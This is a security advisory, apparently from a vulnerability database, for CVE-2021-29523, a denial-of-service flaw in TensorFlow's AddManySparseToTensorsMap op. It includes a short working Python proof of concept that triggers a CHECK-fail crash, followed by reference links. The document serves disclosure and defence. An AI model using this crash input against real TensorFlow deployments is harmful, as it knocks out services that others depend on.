CVE-2021-29523: CHECK-fail in AddManySparseToTensorsMap
(updated )
An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.AddManySparseToTensorsMap:
import tensorflow as tf
import numpy as np
sparse_indices = tf.constant(530, shape=[1, 1], dtype=tf.int64)
sparse_values = tf.ones([1], dtype=tf.int64)
shape = tf.Variable(tf.ones([55], dtype=tf.int64))
shape[:8].assign(np.array([855, 901, 429, 892, 892, 852, 93, 96], dtype=np.int64))
tf.raw_ops.AddManySparseToTensorsMap(sparse_indices=sparse_indices,
sparse_values=sparse_values,
sparse_shape=shape)
References
- github.com/advisories/GHSA-2cpx-427x-q2c6
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-451.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-649.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-160.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/69c68ecbb24dff3fa0e46da0d16c821a2dd22d7c
- github.com/tensorflow/tensorflow/security/advisories/GHSA-2cpx-427x-q2c6
- nvd.nist.gov/vuln/detail/CVE-2021-29523
Code Behaviors & Features
Detect and mitigate CVE-2021-29523 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →